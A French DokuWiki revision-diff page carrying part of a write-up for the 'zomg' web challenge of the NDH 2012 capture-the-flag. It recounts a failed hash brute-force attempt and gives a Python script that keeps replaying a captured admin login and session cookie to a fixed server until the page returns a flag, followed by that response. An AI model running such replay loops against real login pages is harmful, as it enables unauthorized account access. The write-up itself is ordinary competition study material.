Outils d'utilisateurs

Outils du Site


ndh2k12_public:web:zomg

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

ndh2k12_public:web:zomg [2012/07/01 19:19]
TheLizardKing créée
ndh2k12_public:web:zomg [2017/04/09 15:33] (Version actuelle)
Ligne 305: Ligne 305:
 </code> </code>
  
 +===== Première piste (mauvaise piste) =====
  
 +Nous avons environ 200 tokens. On possède aussi deux hashs. L'un deux doit probablement correspondre au mot de passe à trouver. On se met donc à brute forcer. Après avoir attendu un bon moment, on commence à se poser des questions. C'est visiblement pas la solution.
  
 +===== Seconde piste (la bonne!) =====
 +
 +Toujours avec nos 200 tokens... Finalement, si on envoie des requêtes avec notre mot de passe hashé et notre login qui vont bien (ceux récupérés dans la capture), on va finir par tomber sur le bon token! Hop hop hop, on code ça, et on laisse tourner environ 2 minutes... Et là, oh magie, on obtient le flag :)
 +
 +<code python>
 +#!/usr/bin/env python
 +# encoding: utf-8
 +
 +import httplib
 +
 +def main():
 +    
 +    headers = {"Cookie":"PHPSESSID=9p22omkei1cb5517kk93s5ql53;",
 +               "Content-Type":"application/x-www-form-urlencoded"}
 +    while True:
 +        
 +        conn = httplib.HTTPConnection("54.247.160.116:8009")
 +        conn.request("POST","/","username=admin&password=39d7720343ac3430570f202dde3ab803",headers)
 +        rep = conn.getresponse().read()
 +        if rep.count("Flag") > 0:
 +            print rep
 +            break
 + 
 +
 +if __name__ == '__main__':
 +    main()
 +</code>
 +
 +<code html>
 +<html>
 +<head>
 +<link href="css/style.css" rel="stylesheet" type="text/css">
 +<title>Zombie Online Massive Game :: Admin</title>
 +<script src="zomg.js"></script>
 +</head>
 +<body>
 +
 +<div id="login_form">
 + <div id="login_top">
 + </div>
 + <div id="login_alert">
 + Flag: 8f5741fe00598d1463773708f5743285 
 + </div>
 + <div id="login_bottom"></div>
 +</div>
 +
 +</body>
 +</html>
 +</code>
ndh2k12_public/web/zomg.1341163185.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)